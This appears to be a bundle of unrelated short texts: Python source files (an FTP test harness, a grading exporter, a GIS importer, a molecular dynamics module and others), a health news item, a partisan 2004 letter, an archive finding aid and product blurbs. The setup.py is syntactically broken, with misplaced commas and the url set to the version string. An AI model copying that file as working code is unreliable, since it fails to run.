env=env)
# Block until the server writes a line to stdout
self.ftp_server.stdout.readline()
# Poll until a connection can be made
start_time = time.time()
while time.time() - start_time < 5:
try:
ftpurl = urllib.urlopen('ftp://127.0.0.1:%s' % use_port)
except IOError:
time.sleep(0)
else:
ftpurl.read()
ftpurl.close()
break
else:
# Avoid a possible infinite loop
raise Exception("Unable to connect to ftp server")
self.fs = ftpfs.FTPFS('127.0.0.1', 'user', '12345', dircache=True, port=use_port, timeout=5.0)
self.fs.cache_hint(True)
def tearDown(self):
#self.ftp_server.terminate()
if sys.platform == 'win32':
os.popen('TASKKILL /PID '+str(self.ftp_server.pid)+' /F')
else:
os.system('kill '+str(self.ftp_server.pid))
shutil.rmtree(self.temp_dir)
self.fs.close()
def check(self, p):
check_path = self.temp_dir.rstrip(os.sep) + os.sep + p
return os.path.exists(check_path.encode('utf-8'))
if __name__ == "__main__":
# Run an ftp server that exposes a given directory
import sys
authorizer = DummyAuthorizer()
authorizer.add_user("user", "12345", sys.argv[1], perm="elradfmw")
authorizer.add_anonymous(sys.argv[1])
#def nolog(*args):
# pass
#ftpserver.log = nolog
#ftpserver.logline = nolog
handler = FTPHandler
handler.authorizer = authorizer
address = ("127.0.0.1", int(sys.argv[2]))
#print address
ftpd = FTPServer(address, handler)
sys.stdout.write('serving\n')
sys.stdout.flush()
ftpd.serve_forever()
|
The government of Carroll County, Tennessee, maintains no official website; researchers must find county information at the state level. The Tennessee Vital Records Office (http://health.state.tn.us/vr/Genealogy.htm) keeps birth records for 100 years and death, marriage, and divorce records for 50 years; after that time, the records are sent to the Tennessee State Library and Archives (http://www.tn.gov/tsla/history/county/factcarroll.htm) for public access and research. To receive records directly from the Internet, inquiries should be made to VitalChek (http://www.vitalchek.com/tennessee-express-vital-records.aspx), which charges a processing fee in addition to the Vital Records Office fees. The Carroll County courthouse experienced a fire in 1931, a fact that may affect the availability of official records.
|
from openpyxl import Workbook
from webview import WebView
import gradeSettings
class outputControl():
def __init__(self, sectionList, name, submissionFolder):
self.sectionList = sectionList
self.name = name
self.database = {}
self.submissionFolder = submissionFolder
self.section = dict([(sect,{'workbook':Workbook(),'webview': WebView(name + '-' + sect + '-' + submissionFolder + '.html', submissionFolder)}) for sect in sectionList])
for key in self.section:
self.section[key]['worksheet'] = self.section[key]['workbook'].active
self.section[key]['webview'].createBody()
self.section[key]['webview'].insertTitle('Auto Grading Sheet For ' + name + ' Section:' + key)
self.section[key]['webview'].createGradingTable()
self.section[key]['worksheet'].append(['Student Name','Student UID','Comment']+ gradeSettings.GRADING_RULES_ORDER)
def close(self):
for key in self.section:
self.section[key]['webview'].endTable()
self.section[key]['webview'].endBody()
self.section[key]['workbook'].save('../' + self.name + '-' + key + '-' + self.submissionFolder +".xlsx")
def insert(self, studentName, studentID, submissionNum, partner, section, errorMessage, detailedGrade, output, fileName):
if studentID in self.database.keys():
print 'insert student:', studentID
if submissionNum < self.database[studentID]['submissionNum']:
return False
self.database[studentID] = {
'studentName':studentName,
'studentID':studentID,
'submissionNum':submissionNum,
'partner':partner,
'section':section,
'errorMessage':errorMessage,
'detailedGrade':detailedGrade,
'output':output,
'fileName':fileName
}
def dump(self):
for key, values in self.database.iteritems():
self.section[values['section']]['webview'].insertGradingTable(values['studentName'],
key,
values['partner'],
sum(values['detailedGrade']),
values['errorMessage'],
values['fileName'])
self.section[values['section']]['worksheet'].append([values['studentName'], key, values['output'].replace(';','\n')] + values['detailedGrade'])
self.close()
|
5 Ways for your family to be active during National Physical Fitness and Sports Month!
Home » 5 Ways for your family to be active during National Physical Fitness and Sports Month!
Bubble bonanza! Fun for all ages! If you are looking for a simple activity sure to capture kids attention (especially littles) and get them moving, look no further than a bottle of bubbles!
Bike to school! National walk / bike to school day was May 10th. Missed it? No problem! Round up some neighborhood friends and repeat this on your own!
Family game night! Check out previous blog posts for ideas or fall back on some old time favorites of ours: Twister, Charades, or Simon Says.
Park playdate! Invite friends to meet you at a local park for some free play and a friendly game of kickball!
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('excel_import', '0007_document_current'),
]
operations = [
migrations.CreateModel(
name='ChangeRequest',
fields=[
('id', models.AutoField(serialize=False, auto_created=True, primary_key=True, verbose_name='ID')),
('new_value', models.CharField(max_length=255)),
('old_value', models.CharField(max_length=255, blank=True)),
('created_on', models.DateTimeField(auto_now_add=True)),
('accepted_on', models.DateTimeField(null=True, blank=True)),
('accepted_by', models.ForeignKey(null=True, related_name='+', blank=True, to=settings.AUTH_USER_MODEL)),
('author', models.ForeignKey(to=settings.AUTH_USER_MODEL)),
('target_cell', models.ForeignKey(to='excel_import.Cell')),
],
),
]
|
THURSDAY, May 24, 2018 (HealthDay News) -- Where you live can have a major effect on your health, new research suggests.
Living in a diverse community where people are better educated, make more money and have good health care nearby is linked to greater well-being and a better quality of life, the study authors said.
"Our communities have a big impact on our health and well-being," said study lead author Dr. Brita Roy. She's an associate professor of medicine and director of population health at Yale University Medicine in New Haven, Conn.
"This study suggests that if we are going to start working toward building communities to promote health and well-being, we need to work across sectors. Health care alone can't do it. Transportation alone can't do it. There has to be a collaborative effort to improve health and well-being for everyone," Roy said.
Feelings of well-being and satisfaction with your quality of life have been associated with a longer life and better health outcomes, the researchers noted.
But Roy pointed out that the design of the new study means researchers can't prove a cause-and-effect relationship between certain community characteristics -- such as medical, social and environmental factors -- and a sense of well-being.
"That means we don't know at this point if we improve these factors if well-being will go up," she said.
The study included more than 300,000 adults from a nationwide sample. The researchers identified 77 characteristics that they felt might contribute to peoples' well-being.
But many of those characteristics are related to one another, Roy said. For example, a low-income area might also have a higher minority population and more people with lower education. So, the researchers worked to remove duplication and narrowed the list to a dozen characteristics.
"These 12 factors accounted for more than 90 percent of the variation we see in well-being," Roy said.
Lower rates of child poverty.
Fewer people with less than a high school diploma.
Fewer people with a high school diploma/GED.
More people with a college degree.
A higher average household income.
More eligible women obtaining mammography.
Lower rates of preventable hospitalizations.
Fewer federally qualified health centers.
More people commuting by bicycle.
Fewer people commuting by public transit.
The racial make-up of a community was an important factor in its well-being.
"I was pleasantly surprised to see that a greater percentage of black residents was associated with higher well-being," Roy said. "After you account for income and education, places that are more racially mixed have higher well-being. Prior studies have shown that more diversity generally leads to more tolerance in the community and less overall stress and worry."
Another key factor was how many people commuted to work on a bicycle.
"This had a big impact on physical and mental well-being," Roy noted.
The third big factor in well-being was access to health care, especially preventive care.
"When people perceive that they have access to good medical care, it gives them peace of mind," Roy said.
Two factors Roy expected to see on the list that didn't make it were crime rates and income inequality.
Mary Rzeszut, a licensed clinical social worker in the department of behavioral health at NYU Winthrop Hospital in Mineola, N.Y., said the study underscores what hospital workers see every day.
"People who don't have access to health care have poorer outcomes and a decrease in well-being. The same is true for people with lower socioeconomic status," she said.
"The researchers really honed in on what we might do to bring forth well-being, and it will likely require thinking outside the box, like when Citibank sponsored the Citi Bike program in New York City to give people access to a bike and the ability to exercise. It helps improve quality of life and opens up other options to us," Rzeszut explained.
The study by Roy and colleagues was published online May 23 in the journal PLoS One.
|
#
# setup.py
#
from setuptools import setup
import growler_vhost
NAME = "growler_vhost"
desc = """The Growler vhost server acts as forwarding agent for HTTP requests to
multiple domains hosted from a single server."""
description = """The Growler vhost server acts as forwarding agent for HTTP
requests to multiple domains hosted from a single server. This is an
implementation of the service using the _Growler_ microframework to handle the
incoming request. As with everything Growler, all events are asynchronous, and
handled when-needed.
This package comes as a binary, which can be run in the form of `growler-vhost
-c <config_file>`, specifying the path to the config file to use as parameters.
I have a hope that optimizations can be made such that forwarding the request to
another growler server takes (almost) no extra resources. As the request can
easily be parsed once into the format that the growler application already uses.
We are a long way from that, though.
"""
REQUIRES = [
'growler'
]
KEYWORDS = [
'vhost',
'virtual server'
]
CLASSIFIERS = [
"Development Status :: 2 - Pre-Alpha",
# "Framework :: Growler",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.4",
"Topic :: Internet :: WWW/HTTP",
"Natural Language :: English"
],
setup(
name=NAME,
version=growler_vhost.__version__,
author=growler_vhost.__author__,
license=growler_vhost.__license__,
url=growler_vhost.__version__,
author_email=growler_vhost.__contact__,
description=desc,
long_description=description,
classifiers=CLASSIFIERS
install_requires = ['growler'],
packages = ['growler_vhost']
)
|
It seems to me that the major issue in the campaign for president, especially this year, is leadership. We have a president who inherited a sadly neglected FBI, CIA and armed forces. After our nation was attacked on Sept. 11, 2001, President Bush reacted positively and declared the war on terrorism and invaded Afghanistan, deposing the Taliban. Afghanistan has since had free elections for the first time in its history. After watching Saddam Hussein ignore 17 demands to disarm by the United Nations, Bush made the correct decision to eliminate Hussein and his terrorist regime, which we have done. Progress in Iraq has been slow but sure. John Kerry says he would have continued negotiating--shades of Neville Chamberlain and his negotiating with another tyrant, Adolf Hitler. We do not need an appeaser as president of the United States.
|
##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RGlobaloptions(RPackage):
"""It provides more controls on the option values such as validation and
filtering on the values, making options invisible or private."""
homepage = "https://cran.r-project.org/package=GlobalOptions"
url = "https://cran.rstudio.com/src/contrib/GlobalOptions_0.0.12.tar.gz"
list_url = "https://cran.r-project.org/src/contrib/Archive/GlobalOptions"
version('0.0.12', '6c268b3b27874918ba62eb0f6aa0a3e5')
depends_on('r-testthat', type=('build', 'run'))
depends_on('r-knitr', type=('build', 'run'))
depends_on('r-markdown', type=('build', 'run'))
|
Archibald E. Roberts (1915-2005) was a retired lieutenant colonel and founder of the Committee to Restore the Constitution. The collection consists of Roberts' correspondence, speeches, and writings as well as numerous boxes of printed and audio-visual propaganda from Robert's personal collection.
Archibald E. Roberts (1915-2005) was a retired lieutenant colonel and founder of the Committee to Restore the Constitution. He was born in Cheboygan, Michigan. Roberts was educated at the Command and General Staff College, the Armed Forces Information School, the Airborne School, and the Medical Field Service School. Roberts, an ex-paratrooper, served with the 11th Airborne Division, the 187th Airborne Regimental Combat Team, the 101st Airborne Division, and the 3rd Infantry Division as an Army information officer.
While under the command of General Edwin A. Walker in Augsburg, Germany, 1959-1960, Roberts served as a special projects officer. He wrote and directed the 24th Infantry Division “Pro Blue” troop information program which became the central issue in the 1962 Senate “military muzzling” investigations. He was relieved of active duty by order of the Secretary of the Army, Cyrus R. Vance, on May 7, 1962, following a speech before the Daughters of the American Revolution in Washington, D.C.
Roberts became a successful litigant against the Secretary of the Army and other Pentagon officials in a law suit involving freedom of speech and military personnel. Roberts recovered pay, allowances, and reinstatement to active duty. He voluntarily retired in 1965.
Roberts established the Committee to Restore the Constitution, a non-profit Colorado corporation, in Fort Collins, and served as its director. He helped establish affiliate committees in New York, Illinois, Wisconsin, Texas, and other places. He addressed joint sessions of the Alabama and Mississippi state legislatures and testified before many state committees. He conferred with many state office holders on issues of regional government and land control.
Roberts was an active public speaker on such topics as the United Nations, bussing, world government, and the economic problems facing the United States. He is the author of Victory Denied, The Anatomy of a Revolution, PEACE, by the Wonderful People Who Brought You Korea and Vietnam, and other works on the United Nations and world government. Roberts was the recipient of numerous awards including Noteworthy American, 1978 from the Historical Preservations of America, and the Liberty Award, 1976, from the Congress of Freedom.
The collection consists of Roberts' correspondence, speeches, and writings as well as numerous boxes of printed and audio-visual propaganda from Robert's personal collection.
The initial accession includes correspondence, speeches, writings, tape recordings, and miscellaneous documents.
Outgoing correspondence includes personal correspondence from 1953-1965, and correspondence related to the Committee to Restore the Constitution from 1965-1976. Incoming correspondence covers the period from 1953-1974. Major correspondents include: Gordon Allott, Jane Thompson (Arizona Women for Constitutional Government), Frazer Arnold, Billy James Hargis (Christian Crusade), Myron C. Fagan (Cinema Educational Guild, Inc.), Craighill, Aiello, Gasch & Craighill, Pedro A. del Valle (Defenders of the Constitution, Inc.), George B. Fowler, Charles Hallberg, Liberty Lobby, Corliss C. Moseley, National Economic Council, Inc., New Yorkers for the Constitution, Inc., Jack Poorbaugh, Strom Thurmond, George Wallace, and Women for Constitutional Government.
Roberts writings include drafts of mailings and supplements as well as some published works. There is also a container of tape recordings including Land Control Laws-Do They Cancel Your Private Property Rights? and Regional Government, a speech before the Indiana State Legislature.
Miscellaneous documents include but are not limited to transcripts of the Committee to Restore the Constitution's Action Line Broadcast, mailing lists, and financial statements. There are also two folders of material related to General Edwin A. Walker.
Accession Up 611.M: audiovisual materials including Regionalism, a video presentation on a non-vhs tape.
Accession 85.406x.M / Up 126 includes cassette tapes and video recordings of Archibald Roberts discussing the Federal Reserve system, May 23, 1984.
Accession 00.014.M / Up 097 includes a video cassette copy of Real Genius with a letter addressed to Roberts wrapped around it, and carefully placed inside the packaging for an antiquated computer program as well as collected conservative publications.
Accession Up 120.M includes envelopes containing audio cassettes in the Dr. Beter Audio Letter series as well as reel to reels and miscellaneous conservative publications.
Accession 12.032.M includes audio tapes, pamphlets, and miscellaneous conservative mailings.
Accession Up 612.M includes audio tapes and miscellaneous conservative mailings.
Accession 85.387x.M / Up 121 includes audio tapes and miscellaneous conservative mailings.
Accession 98.026.M / Up 886 includes audio tapes and miscellaneous conservative mailings.
Accession Up 609.M includes miscellaneous conservative mailings.
Accession 81.26.M / Up 610 includes miscellaneous conservative mailings.
Accession Up 613.M includes miscellaneous conservative mailings.
Accession Up 617.M includes miscellaneous conservative mailings.
Accession Up 693.M includes miscellaneous conservative mailings.
Accession 85.384x.M / Up 122 includes miscellaneous conservative mailings.
Accession 85.407x.M / Up 123 includes miscellaneous conservative mailings.
Accession 85.409x.M / Up 608 includes miscellaneous conservative mailings.
Accession 85.411x.M / Up 699 includes miscellaneous conservative mailings.
Accession 89.02.M / Up 606 includes collected conservative publications.
Accession 90.66.M. / Up 699 includes collected conservative serial publications and pamphlets.
[Identification of item], Archibald Roberts collection, Ax 824, Special Collections & University Archives, University of Oregon Libraries, Eugene, Oregon.
The original accession is arranged into the following series: Correspondence, Speeches, Writings, Publications, and Miscellaneous. Subsequent accessions have little to no intellectual or physical arrangement. Any arrangement may have derived from the records' creators or custodians. It may be necessary to look in multiple places for the same types of materials.
Committee to Restore the Constitution--Records and correspondence.
Finding aid prepared by Austin Munsell and Kira B. Homo.
|
#!/usr/bin/env python
#
# $Id: DisabledUnitTestTest.py 4193 2011-01-04 23:19:42Z dhh1969 $
#
# Proprietary and confidential.
# Copyright $Date:: 2011#$ Perfect Search Corporation.
# All rights reserved.
#
import sys, os, _testcase
from unittest2 import TestCase, skip
from codescan.disabled_unit_test import *
from testsupport import checkin, officialbuild
# We're beginning the string constant in an odd way so we don't
# cause this file to show up in the list of those containing
# a disabled unit test.
DESC = '/' + '''*
UNIT TEST TEMPORARILY DISABLED
By: your name
When: 2011-02-27
Ticket: #295
Which: testFoo
Where: all 32-bit platforms
Owner: fred@flintstones.org, barney@rubble.org
Why: description of problem, including copy-and-paste
from error log
*/'''
PREFIX = '''
#if 0
this is inactive text
#if 1
this is also inactive
#endif
#endif
/**
* some more text that's inactive
*/
''' + DESC
OFFSET = PREFIX.find(DESC)
CPP_SUFFIX1 = '''
// a comment
SIMPLE_TEST(foo)'''
CPP_SUFFIX2 = '''/*
SOME MORE COMMENTS
*/
class SpecialTest: public SomethingTest {
}'''
JAVA_SUFFIX = '''//@Test
public void testSomething() {
}'''
@skip("9/16/2011 this test can't be run until we finish work on the test runner -- Julie Jones")
@officialbuild
class DisabledUnitTestTest(_testcase.TestCaseEx):
def validateDut(self, dut, errors):
errors += self.checkProp(dut, 'ticket', '295')
errors += self.checkProp(dut, 'which', 'testFoo')
errors += self.checkProp(dut, 'where', 'all 32-bit platforms')
errors += self.checkProp(dut, 'when', '2011-02-27')
errors += self.checkProp(dut, 'by', 'your name')
errors += self.checkProp(dut, 'owner', 'fred@flintstones.org, barney@rubble.org')
errors += self.checkProp(dut, 'why', 'description of problem, including copy-and-paste from error log')
errorsX = self.checkProp(dut, 'lineNum', '11')
if errorsX:
self.printWithLineNums(txt)
self.assertEquals(0, errors)
def testDisabledUnitTestPropertiesCppSuffix1(self):
txt = PREFIX + CPP_SUFFIX1
dut = DisabledUnitTest('bar/footest.cpp', txt, OFFSET, OFFSET + len(DESC))
errors = self.checkProp(dut, 'path', 'bar/footest.cpp')
self.validateDut(dut, errors)
def testDisabledUnitTestPropertiesCppSuffix2(self):
txt = PREFIX + CPP_SUFFIX2
dut = DisabledUnitTest('bar/footest.cpp', txt, OFFSET, OFFSET + len(DESC))
errors = self.checkProp(dut, 'path', 'bar/footest.cpp')
self.validateDut(dut, errors)
def testDisabledUnitTestPropertiesJavaSuffix(self):
txt = PREFIX + JAVA_SUFFIX
dut = DisabledUnitTest('bar/footest.java', txt, OFFSET, OFFSET + len(DESC))
errors = self.checkProp(dut, 'path', 'bar/footest.java')
self.validateDut(dut, errors)
|
High quality rubber damper that reduces noise and vibration significantly.
Pack of four savers designed for recurve bows. It controls the vibration of the limb, allowing for faster arrow speeds. Available in 4 colours.
|
#!/usr/bin/env python
############################################################################
#
# MODULE: v.in.gns
#
# AUTHOR(S): Markus Neteler, neteler itc it
# Converted to Python by Glynn Clements
#
# PURPOSE: Import GEOnet Names Server (GNS) country files into a GRASS vector map
# http://earth-info.nga.mil/gns/html/
# -> Download Names Files for Countries and Territories (FTP)
#
# Column names: http://earth-info.nga.mil/gns/html/help.htm
#
# COPYRIGHT: (c) 2005 GRASS Development Team
#
# This program is free software under the GNU General Public
# License (>=v2). Read the file COPYING that comes with GRASS
# for details.
#
# TODO: - see below in the code
# - add extra columns explaining some column acronyms,
# e.g. FC (Feature Classification)
#############################################################################
#%module
#% description: Imports US-NGA GEOnet Names Server (GNS) country files into a GRASS vector points map.
#% keywords: vector
#% keywords: import
#% keywords: gazetteer
#%end
#%option G_OPT_F_INPUT
#% description: Name of input uncompressed GNS file from NGA (with .txt extension)
#%end
#%option G_OPT_V_OUTPUT
#% required: no
#%end
import sys
import os
from grass.script import core as grass
from grass.script import vector as vgrass
def main():
fileorig = options['input']
filevect = options['output']
if not filevect:
filevect = grass.basename(fileorig, 'txt')
#are we in LatLong location?
s = grass.read_command("g.proj", flags='j')
kv = grass.parse_key_val(s)
if kv['+proj'] != 'longlat':
grass.fatal(_("This module only operates in LatLong/WGS84 locations"))
#### setup temporary file
tmpfile = grass.tempfile()
coldescs = [("RC", "rc integer"),
("UFI", "uf1 integer"),
("UNI", "uni integer"),
("LAT", "lat double precision"),
("LONG", "lon double precision"),
("DMS_LAT", "dms_lat varchar(6)"),
("DMS_LONG", "dms_long varchar(7)"),
("UTM", "utm varchar(4)"),
("JOG", "jog varchar(7)"),
("FC", "fc varchar(1)"),
("DSG", "dsg varchar(5)"),
("PC", "pc integer"),
("CC1", "cci varchar(2)"),
("ADM1", "adm1 varchar(2)"),
("ADM2", "adm2 varchar(200)"),
("DIM", "dim integer"),
("CC2", "cc2 varchar(2)"),
("NT", "nt varchar(1)"),
("LC", "lc varchar(3)"),
("SHORT_FORM", "shortform varchar(128)"),
("GENERIC", "generic varchar(128)"),
("SORT_NAME", "sortname varchar(200)"),
("FULL_NAME", "fullname varchar(200)"),
("FULL_NAME_ND","funamesd varchar(200)"),
("MODIFY_DATE", "mod_date date")]
colnames = [desc[0] for desc in coldescs]
coltypes = dict([(desc[0], 'integer' in desc[1]) for desc in coldescs])
header = None
num_places = 0
inf = file(fileorig)
outf = file(tmpfile, 'wb')
for line in inf:
fields = line.rstrip('\r\n').split('\t')
if not header:
header = fields
continue
vars = dict(zip(header, fields))
fields2 = []
for col in colnames:
if col in vars:
if coltypes[col] and vars[col] == '':
fields2.append('0')
else:
fields2.append(vars[col])
else:
if coltypes[col]:
fields2.append('0')
else:
fields2.append('')
line2 = ';'.join(fields2) + '\n'
outf.write(line2)
num_places += 1
outf.close()
inf.close()
grass.message(_("Converted %d place names.") % num_places)
#TODO: fix dms_lat,dms_long DDMMSS -> DD:MM:SS
# Solution:
# IN=DDMMSS
# DEG=`echo $IN | cut -b1,2`
# MIN=`echo $IN | cut -b3,4`
# SEC=`echo $IN | cut -b5,6`
# DEG_STR="$DEG:$MIN:$SEC"
#modifications (to match DBF 10 char column name limit):
# short_form -> shortform
# sort_name -> sortname
# full_name -> fullname
# full_name_sd -> funamesd
# pump data into GRASS:
columns = [desc[1] for desc in coldescs]
grass.run_command('v.in.ascii', cat = 0, x = 5, y = 4, fs = ';',
input = tmpfile, output = filevect,
columns = columns)
grass.try_remove(tmpfile)
# write cmd history:
vgrass.vector_history(filevect)
if __name__ == "__main__":
options, flags = grass.parser()
main()
|
At Sarica, we provide fast reliable service in diverse industries from the Aerospace, Defense, Automotive, and Industrial markets. We build quality parts, that are represented on many airborne platforms such as 747, 787, A320, MH-60, CH-47, and F-22.
We specialize in manufacturing to your designs or we can offer you technical assistance in engineering a product for you.
We can manufacture a customized harness for any application. Low to mid volume units can be built to your specifications, or our engineering staff can develop a design for your application. We have a large inventory of tooling to support terminals and contacts from Amp, Molex, Panduit, Pioneer, LEMO, and many others. We can qualify your product for unique applications.
Sarica offers complete circuit card manufacturing from surface mount to leaded applications. We are a leader in producing metal core LED products for military applications. We can produce your boards using tin/lead solder for defense applications. We can apply conformal coating in applications that see more harsh environments. You can supply the kits complete or Sarica will procure all material including the PCB.
© 2019 Copyright Sarica Manufacturing.
|
"""\
Dynamics.py: Module for molecular dynamics
This program is part of the PyQuante quantum chemistry program suite.
Copyright (c) 2004, Richard P. Muller. All Rights Reserved.
PyQuante version 1.2 and later is covered by the modified BSD
license. Please see the file LICENSE that is part of this
distribution.
"""
from NumWrap import array,zeros
from Constants import Rgas
from math import sqrt,pow
from IO import append_xyz
# Derivation of units for Force constant: (Thanks to Alejandro Strachan)
# We have accel in (kcal/mol)/(A*g/mol) and we want it in A/ps^2
# (kcal/mol)/(A*g/mol) = kcal/(A*g) = 1000 kcal/(A*kg)
# = 1000 kcal/(A*kg) * 4.184 J/cal = 4184 kJ/(A*kg)
# = 4.184e6 (kg m^2/s^2)/(A*kg) = 4.184e6 m^2/s^2/A
# = 4.184e26 A/s^2 = 418.4 A/(ps^2)
fconst = 418.4 # convert (kcal/mol)/(A*g/mol) to A/ps^2
# The inverse of this quantity transforms back from amu*(A^2/ps^2) to kcal/mol
def Dynamics(atoms,EnergyForces,nsteps=1000,Ti=298,dt=1e-3):
xyz = open('pyqmd.xyz','w')
dat = open('pyqmd.dat','w')
set_boltzmann_velocities(atoms,Ti)
Etot = 0
for step in xrange(nsteps):
append_xyz(xyz,atoms.atuples(),"PQMD %4d E = %10.4f" % (step,Etot))
try:
Ev,F = EnergyForces(atoms)
except:
print "Using averaging to try and converge"
Ev,F = EnergyForces(atoms,0.5)
set_forces(atoms,F)
LeapFrogUpdate(atoms,dt)
#for atom in atoms: flask.bounce(atom)
Ek = get_kinetic(atoms)
T = get_temperature(atoms)
#rescale_velocities(atoms,Ti) # uncomment for iso-kinetics
Etot = Ev+Ek
print step*dt,Etot,Ev,Ek,T
dat.write("%10.4f %10.4f %10.4f %10.4f %10.4f\n" %
(step*dt,Etot,Ev,Ek,T))
dat.flush()
return
def get_kinetic(atoms):
sum_mv2 = 0
for atom in atoms: sum_mv2 += atom.mass()*atom.v0.squared()
return 0.5*sum_mv2/fconst
# There's a disconnect here, in that the kinetic energy is being
# computed with v0 (v(t)) and the temperature is being computed
# at v (v(t+dt/2))
def get_temperature(atoms):
sum_mv2 = 0
for atom in atoms: sum_mv2 += atom.mass()*atom.v.squared()
return 1000*sum_mv2/((3*len(atoms)-6)*Rgas*fconst)
def LeapFrogUpdate(atoms,dt):
# Leap-frog Verlet dynamics is based on the equations
# v(t+dt/2) = v(t-dt/2)+dt*a(t)
# r(t+dt) = r(t) + dt*v(t+dt/2)
# so that the positions, calculated at dt,2dt,3dt, etc.,
# leap-frog over the velocities, calculated at dt/2,3dt/2,5dt/2...
for atom in atoms:
m = atom.mass()
a = -atom.F*fconst/m # a = F/m
vnew = atom.v + dt*a # v(t+dt/2) = v(t-dt/2) + dt*a
# Save the current velocity for later calc of T,Ek
atom.v0 = 0.5*(vnew+atom.v) # v(t) = 0.5*(v(t-dt/2)+v(t+dt/2)
atom.r += dt*vnew # r(t+dt) = r(t) + dt*v(t+dt/2)
atom.v = vnew
return
def set_forces(atoms,F):
for i in xrange(len(atoms)):
fx,fy,fz = F[i]
atoms[i].F = array((fx,fy,fz))
return
def set_boltzmann_velocities(atoms,T):
from random import gauss,randint
Eavg = Rgas*T/2000 # kT/2 per degree of freedom (kJ/mol)
vels = []
for atom in atoms:
m = atom.mass()
vavg = sqrt(2*Eavg*fconst/m)
stdev = 0.01 #I'm setting the std dev wrong here
atom.v = array((pow(-1,randint(0,1))*gauss(vavg,stdev),
pow(-1,randint(0,1))*gauss(vavg,stdev),
pow(-1,randint(0,1))*gauss(vavg,stdev)))
subtract_com_velocity(atoms)
rescale_velocities(atoms,T)
return
def subtract_com_velocity(atoms):
vcom = get_vcom(atoms)
for atom in atoms: atom.v -= vcom
return
def rescale_velocities(atoms,T):
Tact = get_temperature(atoms)
scalef = sqrt(T/Tact)
for atom in atoms: atom.v *= scalef
return
def get_vcom(atoms):
"Compute the Center of Mass Velocity"
vcom = zeros(3,'d')
totm = 0
for atom in atoms:
m = atom.mass()
vcom += m*atom.v
totm += m
return vcom/totm
if __name__ == '__main__':
from MINDO3 import get_energy_forces
from Molecule import Molecule
rdx = Molecule('RDX',filename='/home/rmuller/gallery/rdx.xyz')
Dynamics(rdx,get_energy_forces,nsteps=3,Ti=4000)
|
We follow a well-defined service plan and are supported by professionals holding rich industry experience. This helps our global clients an easy access to different entry options in India. These services such as “Setting up business in India” are rendered as per the rules and regulations set up by the governing bodies. We are the professional taxation service providers from India and our experts are providing their valuable financial and investment solutions to the clients in United Kingdom.
|
# -*- coding: utf-8 -*-
"""
/***************************************************************************
OpenLayers Plugin
A QGIS plugin
-------------------
begin : 2009-11-30
copyright : (C) 2009 by Pirmin Kalberer, Sourcepole
email : pka at sourcepole.ch
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
from weblayer import WebLayer3857
class OlAppleiPhotoMapLayer(WebLayer3857):
emitsLoadEnd = True
def __init__(self):
WebLayer3857.__init__(self, groupName="Apple Maps", groupIcon="apple_icon.png",
name='Apple iPhoto map', html='apple.html')
|
Rarely can a film infiltrate the glamorous surface of rock legends. IT MIGHT GET LOUD tells the personal stories, in their own words, of three generations of electric guitar virtuosos - The Edge (U2), Jimmy Page (Led Zeppelin), and Jack White (The White Stripes). It reveals how each developed his unique sound and style of playing favorite instruments, guitars both found and invented.
Concentrating on the artist's musical rebellion, traveling with him to influential locations, provoking rare discussion as to how and why he writes and plays, this film lets you witness intimate moments and hear new music from each artist.
The movie revolves around a day when Jimmy Page, Jack White, and The Edge first met and sat down together to share their stories, teach and play.
|
#!/usr/bin/python
import logging
class NullHandler(logging.Handler):
def emit(self, record):
pass
log = logging.getLogger('XivelySyncEngine')
log.setLevel(logging.ERROR)
log.addHandler(NullHandler())
import time
import copy
import threading
from pydispatch import dispatcher
from EventBus import EventBusClient
from DustLinkData import DustLinkData
from SmartMeshSDK import FormatUtils
from SmartMeshSDK.protocols.xivelyConnector import xivelyConnector
class XivelySyncEngine(EventBusClient.EventBusClient):
CHECKDELAY = 5 # in s, delay between verifying that there is so API key
def __init__(self):
# log
log.info('creating instance')
# store params
# local variables
self.connector = None
self.lastCheck = None
self.xivelyApiKey = None
self.subscribedMotes = []
self.statusLock = threading.Lock()
self.status = {}
self.status['apiKeySet'] = 'WAIT...'
self.status['status'] = 'DISCONNECTED'
self.status['numConnectionsOK'] = 0
self.status['numConnectionsFailed'] = 0
self.status['numSubscriptionsFailed'] = 0
self.status['lastConnected'] = None
self.status['lastDisconnected'] = None
self.status['numPublishedOK'] = 0
self.status['numPublishedFail'] = 0
# initialize parent class
EventBusClient.EventBusClient.__init__(self,
signal = 'newDataMirrored',
cb = self._publish,
teardown_cb = self._cleanup,
)
self.name = 'DataConnector_xivelyConnector'
# connect extra events
dispatcher.connect(
self.getStatus,
signal = 'xivelystatus',
weak = False,
)
# add stats
#======================== public ==========================================
def getStatus(self):
with self.statusLock:
return copy.deepcopy(self.status)
#======================== private =========================================
def _cleanup(self):
# disconnect extra events
dispatcher.disconnect(
self.getStatus,
signal = 'xivelystatus',
weak = False,
)
def _publish(self,sender,signal,data):
now = time.time()
dld = DustLinkData.DustLinkData()
mac = data['mac']
#========== connect/disconnect
if (self.lastCheck==None) or (now-self.lastCheck>self.CHECKDELAY):
# remember I just checked
self.lastCheck = now
# we need to use "raw" access because dld.getPublisherSettings()
# does not return all settings
settings = dld.get(['system','publishers','xively'])
# record the xivelyApiKey
xivelyApiKey = None
